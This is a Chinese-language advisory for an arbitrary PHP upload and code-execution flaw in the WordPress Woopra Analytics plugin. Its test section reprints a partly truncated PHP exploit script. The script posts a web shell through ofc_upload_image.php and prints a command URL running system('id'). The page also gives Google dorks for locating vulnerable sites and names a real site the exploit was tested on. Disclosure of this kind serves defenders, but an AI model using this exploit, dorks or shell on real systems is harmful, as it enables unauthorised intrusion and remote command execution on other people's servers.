WordPress Woopra Analytics插件’ofc_upload_image.php’任意PHP代码执行漏洞

漏洞起因
输入验证错误
危险等级

影响系统
WordPress Woopra Analytics

不受影响系统

危害
远程攻击者可以利用漏洞可上传任意PHP文件并执行。
CVSSv2:

攻击所需条件
攻击者必须访问WordPress Woopra Analytics插件。

漏洞信息
WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设自己的网志。
WordPress Woopra Analytics插件’ofc_upload_image.php’脚本不正确过滤用户提交的输入,允许远程攻击者利用漏洞提交特殊的请求,可上传任意PHP文件并执行。

测试方法
# Exploit Title: woopra plugins execute arbitrary PHP code Exploit
# Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/
# Date: [06-10-2013]
# Exploit Author: wantexz
# Vendor Homepage:wordpress.org/plugins/woopra/
# Software Link: wordpress.org/plugins/woopra
# Version: woopra
# Tested on: [wantexz]
# CVE :
# target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php
############################################################################################
# INDONESIANCODER
# by
# WANTEXZ
#
############################################################################################
“;
$headers = array(‘User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:15.0) Gecko/20100101 Firefox/15.0.1’,
‘Content-Type: text/plain’);
echo ” [+] Submitting request to: {$options[‘u’]}\n”;
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $url);
curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
$source = curl_exec($handle);
curl_close($handle);
if(!strpos($source, ‘Undefined variable: HTTP_RAW_POST_DATA’) &&
@fopen($shell, ‘r’))
{
echo ” [+] Exploit completed successfully!\n”;
echo ” ______________________________________________\n\n
{$shell}?cmd=system(‘id’);\n”;
}
else
{
die(” [+] Exploit was unsuccessful.\n”);
}
?>
安全建议

厂商解决方案
目前没有详细解决方案提供:
http://www.wordpress.org

漏洞提供者
wantexz

评论关闭。